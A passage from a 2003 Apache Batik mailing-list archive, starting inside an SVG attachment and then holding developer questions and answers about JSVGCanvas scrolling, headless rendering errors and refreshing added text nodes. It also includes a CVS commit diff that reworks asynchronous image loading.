style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"1042" y2=3D"1073"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"558" = y1=3D"1042" y2=3D"1042"/><text style=3D"font-size:12" x=3D"559" = y=3D"1042">Yoruban_(25)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"1073" y2=3D"1073"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"1060" y2=3D"1087"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"1060" y2=3D"1060"/><text style=3D"font-size:12" x=3D"559" = y=3D"1060">Yoruban_(26)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"1087" y2=3D"1087"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"1078" y2=3D"1096"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1078" y2=3D"1078"/><text style=3D"font-size:12" x=3D"559" = y=3D"1078">Asian_(28)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1096" y2=3D"1096"/><text style=3D"font-size:12" x=3D"559" = y=3D"1096">Yoruban_(29)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"468" x2=3D"558" = y1=3D"1111" y2=3D"1111"/><text style=3D"font-size:12" x=3D"559" = y=3D"1111">E._Pygmy_(32)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"18" x2=3D"486" = y1=3D"1194" y2=3D"1194"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"486" = y1=3D"1164" y2=3D"1224"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"504" = y1=3D"1164" y2=3D"1164"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"504" = y1=3D"1140" y2=3D"1189"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"522" = y1=3D"1140" y2=3D"1140"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"522" = y1=3D"1127" y2=3D"1154"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"558" = y1=3D"1127" y2=3D"1127"/><text style=3D"font-size:12" x=3D"559" = y=3D"1127">W._Pygmy_(37)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"522" x2=3D"540" = y1=3D"1154" y2=3D"1154"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"1145" y2=3D"1163"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1145" y2=3D"1145"/><text style=3D"font-size:12" x=3D"559" = y=3D"1145">W._Pygmy_(38)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1163" y2=3D"1163"/><text style=3D"font-size:12" x=3D"559" = y=3D"1163">W._Pygmy_(40)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"504" x2=3D"540" = y1=3D"1189" y2=3D"1189"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"1180" y2=3D"1198"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1180" y2=3D"1180"/><text style=3D"font-size:12" x=3D"559" = y=3D"1180">W._Pygmy_(46)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1198" y2=3D"1198"/><text style=3D"font-size:12" x=3D"559" = y=3D"1198">W._Pygmy_(48)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"486" x2=3D"540" = y1=3D"1224" y2=3D"1224"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"540" = y1=3D"1215" y2=3D"1233"/><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1215" y2=3D"1215"/><text style=3D"font-size:12" x=3D"559" = y=3D"1215">W._Pygmy_(43)</text><line = style=3D"stroke:rgb(0,0,0);stroke-width:1.0" x1=3D"540" x2=3D"558" = y1=3D"1233" y2=3D"1233"/><text style=3D"font-size:12" x=3D"559" = y=3D"1233">W._Pygmy_(45)</text></svg> ------=_NextPart_000_0017_01C2D213.89E51AE0 Content-Type: text/plain; charset=us-ascii --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------=_NextPart_000_0017_01C2D213.89E51AE0-- From [email protected] Wed Feb 12 14:22:01 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33627 invoked by uid 500); 12 Feb 2003 14:22:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33548 invoked from network); 12 Feb 2003 14:21:58 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Wed, 12 Feb 2003 09:21:57 -0500 To: [email protected] Cc: [email protected] Subject: RE: Scrolling for JSVGCanvas In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "GS" == Geeta Shukla <[email protected]> writes: GS> I am using Batik 1.1.1 for my project to render SVG files. You might try using Batik 1.5b4 or current CVS as they are probably better for most uses at this point. GS> The problem is that I cannot make use of the inner class/fields of GS> JSVGCanvas for scrolling left/right/top/bottom. I tried looking GS> through the JSVGCanvas.java file and found that the method GS> "installActions()" makes a call to all the required inner classes, GS> puts them in a locally created ActionMap hashtable and GS> returns. This seems to me a bug. Does the 1.5beta release has this GS> bug fixed? I guess it isn't clear to me what the bug is. Do you want public access to a scroll up/down/left/right function? If so I suggest you use the 'setRenderingTransform' function. This allows you to provide a new rendering transform for the image (so you can adjust pan, zoom, rotation, skew, etc). GS> Please tell me the way in which I can use scrolling functionality GS> on JSVGCanvas. Iam attaching one of my SVG files for your GS> reference. BTW you probably want to either say overflow="visible" or set the viewBox on the svg element (setting the viewBox is probably what you want to do). This can help you control how the canvas first displays the content. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 12 14:47:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5633 invoked by uid 500); 12 Feb 2003 14:47:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5563 invoked from network); 12 Feb 2003 14:47:05 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Wed, 12 Feb 2003 09:46:53 -0500 To: Sandesk Kamath <[email protected]> Cc: [email protected], [email protected] Subject: RE: error while creating pdf using SVG In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "SK" == Sandesk Kamath <[email protected]> writes: SK> I am getting NoClassDefFoundError while generating the pdf using SK> fop,batik which involves the image display using svg tags.It works SK> fine in some machine and it doesnt works in other machines.It SK> works good in all machines if i remove <BR>the svg code.<BR>please SK> help me what setting i need to do in order to get the pdf.<BR>I am SK> using jdk 1.3 and using JRUN servlet engine.<BR>Running in unix SK> server (SunOS 5.8 ).<BR><BR>I got the following errors.<BR>{<BR> SK> java.lang.NoClassDefFoundError<BR> at SK> java.lang.Class.forName0(Native Method)<BR> at SK> java.lang.Class.forName(Class.java:120)<BR> at SK> java.awt.GraphicsEnvironment.getLocalGraphicsEnvironment(GraphicsEnvironment.java:58)<BR> SK> at SK> java.awt.image.BufferedImage.createGraphics(BufferedImage.java:1011)<BR> This looks like you don't have an X Windows Server set up. I suggest you check the archives of this list as this issue comes up quite regularly (I think it last came up a week or two ago). --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 13 13:11:40 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96489 invoked by uid 500); 13 Feb 2003 13:11:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96467 invoked by uid 500); 13 Feb 2003 13:11:38 -0000 Delivered-To: [email protected] Date: 13 Feb 2003 13:11:37 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/sources/org/apache/batik/ext/awt/image/spi JDKRegistryEntry.java X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/13 05:11:37 Modified: . build.xml sources/org/apache/batik/bridge SVGFilterElementBridge.java sources/org/apache/batik/ext/awt/image/renderable DeferRable.java sources/org/apache/batik/ext/awt/image/spi JDKRegistryEntry.java Log: 1) JDK Registry Entry no longer uses media tracker and components. So with JDK 1.4.x you can use '-Djava.awt.headless=true' to rasterize SVG content without an X display on UNIX systems. 2) Improved DeferRable so you can defer more (the JDK entry takes advantage of this). 3) The build.xml now has a '-Djava.awt.headless=true' jvm arg commented out for svgrasterizer so people can more easily use the rasterizer w/o a display. Revision Changes Path 1.122 +2 -1 xml-batik/build.xml Index: build.xml =================================================================== RCS file: /home/cvs/xml-batik/build.xml,v retrieving revision 1.121 retrieving revision 1.122 diff -u -r1.121 -r1.122 --- build.xml 9 Dec 2002 16:26:28 -0000 1.121 +++ build.xml 13 Feb 2003 13:11:37 -0000 1.122 @@ -866,6 +866,7 @@ <path refid="libs-classpath"/> <pathelement location="resources" /> </classpath> +<!-- <jvmarg value="-Djava.awt.headless=true"/> --> <arg line="${args}"/> </java> </target> 1.15 +3 -2 xml-batik/sources/org/apache/batik/bridge/SVGFilterElementBridge.java Index: SVGFilterElementBridge.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/SVGFilterElementBridge.java,v retrieving revision 1.14 retrieving revision 1.15 diff -u -r1.14 -r1.15 --- SVGFilterElementBridge.java 19 Mar 2002 15:19:25 -0000 1.14 +++ SVGFilterElementBridge.java 13 Feb 2003 13:11:37 -0000 1.15 @@ -84,7 +84,8 @@ filterChain.setFilterResolutionX((int)filterRes[0]); filterChain.setFilterResolutionY((int)filterRes[1]); - // create a map for filter nodes to advertise themselves as named source + // Create a map for filter nodes to advertise themselves as + // named source Map filterNodeMap = new HashMap(11); filterNodeMap.put(SVG_SOURCE_GRAPHIC_VALUE, sourceGraphic); 1.4 +56 -6 xml-batik/sources/org/apache/batik/ext/awt/image/renderable/DeferRable.java Index: DeferRable.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/ext/awt/image/renderable/DeferRable.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- DeferRable.java 3 Aug 2001 17:37:28 -0000 1.3 +++ DeferRable.java 13 Feb 2003 13:11:37 -0000 1.4 @@ -14,6 +14,7 @@ import java.awt.image.RenderedImage; import java.awt.image.renderable.RenderContext; import java.util.Vector; +import java.util.Map; /** * This class allows for the return of a proxy object quickly, while a @@ -27,8 +28,9 @@ */ public class DeferRable implements Filter { - Filter src; - + Filter src; + Rectangle2D bounds; + Map props; /** * Constructor takes nothing */ @@ -63,7 +65,19 @@ public synchronized void setSource(Filter src) { // Only let them set Source once. if (this.src != null) return; - this.src = src; + this.src = src; + this.bounds = src.getBounds2D(); + notifyAll(); + } + + public synchronized void setBounds(Rectangle2D bounds) { + if (this.bounds != null) return; + this.bounds = bounds; + notifyAll(); + } + + public synchronized void setProperties(Map props) { + this.props = props; notifyAll(); } @@ -87,7 +101,20 @@ * it will block until we have a real source. */ public Rectangle2D getBounds2D() { - return getSource().getBounds2D(); + synchronized(this) { + while ((src == null) && (bounds == null)) { + try { + // Wait for someone to set bounds. + wait(); + } + catch(InterruptedException ie) { + // Loop around again see if src is set now... + } + } + } + if (src != null) + return src.getBounds2D(); + return bounds; } public float getMinX() { @@ -107,14 +134,37 @@ * Forward the call (blocking until source is set if need be). */ public Object getProperty(String name) { - return getSource().getProperty(name); + synchronized (this) { + while ((src == null) && (props == null)) { + try { + // Wait for someone to set src | props + wait(); + } catch(InterruptedException ie) { } + } + } + if (src != null) + return src.getProperty(name); + return props.get(name); } /** * Forward the call (blocking until source is set if need be). */ public String [] getPropertyNames() { - return getSource().getPropertyNames(); + synchronized (this) { + while ((src == null) && (props == null)) { + try { + // Wait for someone to set src | props + wait(); + } catch(InterruptedException ie) { } + } + } + if (src != null) + return src.getPropertyNames(); + + String [] ret = new String[props.size()]; + props.keySet().toArray(ret); + return ret; } /** 1.6 +168 -57 xml-batik/sources/org/apache/batik/ext/awt/image/spi/JDKRegistryEntry.java Index: JDKRegistryEntry.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/ext/awt/image/spi/JDKRegistryEntry.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- JDKRegistryEntry.java 7 Aug 2001 17:28:22 -0000 1.5 +++ JDKRegistryEntry.java 13 Feb 2003 13:11:37 -0000 1.6 @@ -8,25 +8,25 @@ package org.apache.batik.ext.awt.image.spi; +import java.awt.Toolkit; +import java.awt.Graphics2D; +import java.awt.Image; +import java.awt.geom.Rectangle2D; +import java.awt.image.ImageObserver; +import java.awt.image.RenderedImage; +import java.awt.image.BufferedImage; + import java.net.URL; import java.net.MalformedURLException; +import java.util.HashMap; + import org.apache.batik.ext.awt.image.renderable.Filter; import org.apache.batik.ext.awt.image.renderable.RedRable; import org.apache.batik.ext.awt.image.renderable.DeferRable; import org.apache.batik.ext.awt.image.GraphicsUtil; import org.apache.batik.util.ParsedURL; -import java.awt.Toolkit; -import java.awt.MediaTracker; -import java.awt.Label; -import java.awt.Component; -import java.awt.Graphics2D; -import java.awt.Image; -import java.awt.image.RenderedImage; -import java.awt.image.BufferedImage; - - /** * This Image tag registy entry is setup to wrap the core JDK * Image stream tools. @@ -79,74 +79,185 @@ */ public Filter handleURL(ParsedURL purl, boolean needRawData) { - URL url; + final URL url; try { url = new URL(purl.toString()); } catch (MalformedURLException mue) { return null; } - Toolkit tk = Toolkit.getDefaultToolkit(); - final Image img = tk.createImage(url); - if (img == null) - return null; - - RenderedImage ri = loadImage(img); - if (ri == null) - return null; + final DeferRable dr = new DeferRable(); + final String errCode; + final Object [] errParam; + if (purl != null) { + errCode = ERR_URL_FORMAT_UNREADABLE; + errParam = new Object[] {"JDK", url}; + } else { + errCode = ERR_STREAM_FORMAT_UNREADABLE; + errParam = new Object[] {"JDK"}; + } - return new RedRable(GraphicsUtil.wrap(ri)); + Thread t = new Thread() { + public void run() { + Filter filt = null; + + Toolkit tk = Toolkit.getDefaultToolkit(); + Image img = tk.createImage(url); + + if (img != null) { + RenderedImage ri = loadImage(img, dr); + if (ri != null) { + filt = new RedRable(GraphicsUtil.wrap(ri)); + } + } + + if (filt == null) + filt = ImageTagRegistry.getBrokenLinkImage + (this, errCode, errParam); + + dr.setSource(filt); + } + }; + t.start(); + return dr; } // Stuff for Image Loading. - static Component mediaComponent = new Label(); - static MediaTracker mediaTracker = new MediaTracker(mediaComponent); - static int id = 0; - - public RenderedImage loadImage(Image img) { + public RenderedImage loadImage(Image img, final DeferRable dr) { // In some cases the image will be a // BufferedImage (subclass of RenderedImage). if (img instanceof RenderedImage) return (RenderedImage)img; - // Setup the mediaTracker. - int myID; - synchronized (mediaTracker) { - myID = id++; - } + MyImgObs observer = new MyImgObs(); + Toolkit.getDefaultToolkit().prepareImage(img, -1, -1, observer); + observer.waitTilWidthHeightDone(); + int width = observer.width; + int height = observer.height; + dr.setBounds(new Rectangle2D.Double(0, 0, width, height)); + + // Build the image to draw into. + BufferedImage bi = new BufferedImage + (width, height, BufferedImage.TYPE_INT_ARGB); + Graphics2D g2d = bi.createGraphics(); + + // Wait till the image is fully loaded. + observer.waitTilImageDone(); + if (observer.imageError) + return null; + dr.setProperties(new HashMap()); + + g2d.drawImage(img, 0, 0, null); + g2d.dispose(); + + return bi; + } - // Add our image to the media tracker and wait.... - mediaTracker.addImage(img, myID); - while (true) { - try { - mediaTracker.waitForID(myID); - } - catch(InterruptedException ie) { - // Something woke us up but the image - // isn't done yet, so try again. - continue; - }; - // All done! - break; + public class MyImgObs implements ImageObserver { + boolean widthDone = false; + boolean heightDone = false; + boolean imageDone = false; + int width = -1; + int height = -1; + boolean imageError = false; + + int IMG_BITS = ALLBITS|ERROR|ABORT; + + public void clear() { + width=-1; + height=-1; + widthDone = false; + heightDone = false; + imageDone = false; } - // Clean up our registraction - mediaTracker.removeImage(img, myID); + public boolean imageUpdate(Image img, int infoflags, + int x, int y, int width, int height) { + synchronized (this) { + boolean notify = false; + + if ((infoflags & WIDTH) != 0) this.width = width; + if ((infoflags & HEIGHT) != 0) this.height = height; + + if ((infoflags & ALLBITS) != 0) { + this.width = width; + this.height = height; + } + + if ((infoflags & IMG_BITS) != 0) { + if ((!widthDone) || (!heightDone) || (!imageDone)) { + widthDone = true; + heightDone = true; + imageDone = true; + notify = true; + } + if ((infoflags & ERROR) != 0) { + imageError = true; + } + } + + + if ((!widthDone) && (this.width != -1)) { + notify = true; + widthDone = true; + } + if ((!heightDone) && (this.height != -1)) { + notify = true; + heightDone = true; + } - if ((img.getWidth(null) == -1)|| - (img.getHeight(null) == -1)) - return null; + if (notify) + notifyAll(); + } + return true; + } - // Build the image to . - BufferedImage bi = null; - bi = new BufferedImage(img.getWidth(null), - img.getHeight(null), - BufferedImage.TYPE_INT_ARGB); - Graphics2D g2d = bi.createGraphics(); + public synchronized void waitTilWidthHeightDone() { + while ((!widthDone) || (!heightDone)) { + try { + // Wait for someone to set xxxDone + wait(); + } + catch(InterruptedException ie) { + // Loop around again see if src is set now... + } + } + } + public synchronized void waitTilWidthDone() { + while (!widthDone) { + try { + // Wait for someone to set xxxDone + wait(); + } + catch(InterruptedException ie) { + // Loop around again see if src is set now... + } + } + } + public synchronized void waitTilHeightDone() { + while (!heightDone) { + try { + // Wait for someone to set xxxDone + wait(); + } + catch(InterruptedException ie) { + // Loop around again see if src is set now... + } + } + } - g2d.drawImage(img, 0, 0, null); - g2d.dispose(); - return bi; + public synchronized void waitTilImageDone() { + while (!imageDone) { + try { + // Wait for someone to set xxxDone + wait(); + } + catch(InterruptedException ie) { + // Loop around again see if src is set now... + } + } + } } + } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Feb 16 23:59:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45721 invoked by uid 500); 16 Feb 2003 23:59:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45710 invoked from network); 16 Feb 2003 23:59:15 -0000 Subject: SVGOMTextContentElement.getComputedTextLength not implemented From: Felix Breuer <[email protected]> To: Batik Dev List <[email protected]> Content-Type: text/plain Organization: Message-Id: <1045439948.1465.16.camel@tapir> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.0- Date: 17 Feb 2003 00:59:08 +0100 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hello! Trying out a script [1] by Antoine Quint I noticed that some SVG DOM methods [2] are not implemented. I am new to Batik but I might try to fix those gaps. I just wanted to know beforehand if there are some design problems that prevent these methods from being implemented. Some pointers as to what would have to be done, would also be appreciated ;^) [1] http://www.xml.com/pub/a/2002/09/11/quint.html [2] e.g. getComputedTextLength, getNumberOfChars in org.apache.batik.dom.svg.SVGOMTextContentElement Regards, Felix PS: Of course I know that SVGOMTextContentElement is abstract, but SVGOMTextElement does not implement those methods either. -- Felix Breuer <[email protected]> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 17 06:13:24 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62384 invoked by uid 500); 17 Feb 2003 06:13:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62364 invoked from network); 17 Feb 2003 06:13:21 -0000 From: "Geeta Shukla" <[email protected]> To: <[email protected]> Cc: <[email protected]> Subject: Refreshing JSVGCanvas Date: Mon, 17 Feb 2003 11:44:13 +0530 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Importance: Normal X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi, I am using Batik 1.5b4b version. Through the app i am developing i let the user select a svg file and open it. It opens and renders properly. The app also allows user to add more <text> nodes to the SVG document. I take the value for the text node in a JTextArea and create a text node and append to the SVGDocument. My problem is that even after appending the new <text> node it doesn't show up on the JSVGCanvas. I tried doing the following: 1) setSVGDocument(doc) 2) repaint() on JSVGCanvas 3) repaint() on UpdateManager of the canvas. but nothing worked. If i try writing the SVGDocument to a file, it contains the <text> node which i appened. If i reopen this file again thru my app the text node shows up. But i don't want it that way. I need the canvas to refresh when the SVGDocument changes. Please help! I have appended my method which creates the new text node below. Thanks, Geeta Shukla Persistent Systems Ltd, Pune, India - 16 Ph: (020)5678900*671 Email: [email protected] ----------------------------------------------------------------- Note: i have tried creating attribute and element with NS, without NS and with a null NS.. nothing works public void createAnnotationNode( String annotation, int x, int y, int SVGWidth) throws Exception { SVGDocument document = this.getSVGDocument(); SVGSVGElement root = document.getRootElement(); int xScale = x + (annotation.length()*12); if(xScale > SVGWidth) { root.setAttributeNS(null, "width", String.valueOf(xScale)); } // create the text Element text = document.createElementNS(null, "text"); text.setAttributeNS(null,"x", String.valueOf(x)); text.setAttributeNS(null,"y", String.valueOf(y)); text.setAttributeNS(null,"style", "font-size:12"); Text value = document.createTextNode(annotation); text.appendChild(value); // attach the text to the svg root element root.appendChild(text); this.setSVGDocument(document); }//end of method createTextNode --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 17 12:36:35 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74273 invoked by uid 500); 17 Feb 2003 12:36:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74225 invoked from network); 17 Feb 2003 12:36:34 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Mon, 17 Feb 2003 07:36:32 -0500 To: [email protected] Cc: [email protected] Subject: RE: Refreshing JSVGCanvas In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "GS" == Geeta Shukla <[email protected]> writes: GS> Hi, I am using Batik 1.5b4b version. Through the app i am GS> developing i let the user select a svg file and open it. It opens GS> and renders properly. The app also allows user to add more <text> GS> nodes to the SVG document. I take the value for the text node in a GS> JTextArea and create a text node and append to the SVGDocument. My GS> problem is that even after appending the new <text> node it GS> doesn't show up on the JSVGCanvas. I tried doing the following: GS> 1) setSVGDocument(doc) 2) repaint() on JSVGCanvas 3) repaint() on GS> UpdateManager of the canvas. GS> but nothing worked. If i try writing the SVGDocument to a file, it GS> contains the <text> node which i appened. If i reopen this file GS> again thru my app the text node shows up. But i don't want it that GS> way. I need the canvas to refresh when the SVGDocument changes. Sure, I suspect the problem is namespaces. You need to create elements with namespaces and set Attributes with out namespace with the exception of the 'xlink:href' attribute. You also don't need to set the SVG document at the end just modifying it should cause the repaint to happen. One other things occurs to me is that the height of the svg element might be clipping the new text elements. I suggest you try setting the height of the outermost SVG element large enough to show any text elements ahead of time (there have been issues with updates to the width/height on the outermost svg element so don't count on those changes happening automatically). I updated your function as I think it should be. GS> Please help! I have appended my method which creates the new text GS> node below. public void createAnnotationNode( String annotation, int x, int y, int SVGWidth) throws Exception { SVGDocument document = this.getSVGDocument(); SVGSVGElement root = document.getRootElement(); int xScale = x + (annotation.length()*12); if(xScale > SVGWidth) { root.setAttribute("width", String.valueOf(xScale)); } // create the text Element text = document.createElementNS(SVG_NAMESPACE, "text"); text.setAttribute("x", String.valueOf(x)); text.setAttribute("y", String.valueOf(y)); text.setAttribute("style", "font-size:12"); Text value = document.createTextNode(annotation); text.appendChild(value); // attach the text to the svg root element root.appendChild(text); }//end of method createTextNode --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 17 13:37:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56488 invoked by uid 500); 17 Feb 2003 13:37:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56454 invoked from network); 17 Feb 2003 13:37:20 -0000 From: "Geeta Shukla" <[email protected]> To: <[email protected]> Subject: RE: Refreshing JSVGCanvas Date: Mon, 17 Feb 2003 19:07:18 +0530 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <[email protected]> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Thanks alot ! It did work with the namespace stuff. -----Original Message----- From: Thomas E Deweese [mailto:[email protected]] Sent: Monday, February 17, 2003 6:07 PM To: [email protected] Cc: [email protected] Subject: RE: Refreshing JSVGCanvas >>>>> "GS" == Geeta Shukla <[email protected]> writes: GS> Hi, I am using Batik 1.5b4b version. Through the app i am GS> developing i let the user select a svg file and open it. It opens GS> and renders properly. The app also allows user to add more <text> GS> nodes to the SVG document. I take the value for the text node in a GS> JTextArea and create a text node and append to the SVGDocument. My GS> problem is that even after appending the new <text> node it GS> doesn't show up on the JSVGCanvas. I tried doing the following: GS> 1) setSVGDocument(doc) 2) repaint() on JSVGCanvas 3) repaint() on GS> UpdateManager of the canvas. GS> but nothing worked. If i try writing the SVGDocument to a file, it GS> contains the <text> node which i appened. If i reopen this file GS> again thru my app the text node shows up. But i don't want it that GS> way. I need the canvas to refresh when the SVGDocument changes. Sure, I suspect the problem is namespaces. You need to create elements with namespaces and set Attributes with out namespace with the exception of the 'xlink:href' attribute. You also don't need to set the SVG document at the end just modifying it should cause the repaint to happen. One other things occurs to me is that the height of the svg element might be clipping the new text elements. I suggest you try setting the height of the outermost SVG element large enough to show any text elements ahead of time (there have been issues with updates to the width/height on the outermost svg element so don't count on those changes happening automatically). I updated your function as I think it should be. GS> Please help! I have appended my method which creates the new text GS> node below. public void createAnnotationNode( String annotation, int x, int y, int SVGWidth) throws Exception { SVGDocument document = this.getSVGDocument(); SVGSVGElement root = document.getRootElement(); int xScale = x + (annotation.length()*12); if(xScale > SVGWidth) { root.setAttribute("width", String.valueOf(xScale)); } // create the text Element text = document.createElementNS(SVG_NAMESPACE, "text"); text.setAttribute("x", String.valueOf(x)); text.setAttribute("y", String.valueOf(y)); text.setAttribute("style", "font-size:12"); Text value = document.createTextNode(annotation); text.appendChild(value); // attach the text to the svg root element root.appendChild(text); }//end of method createTextNode --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, 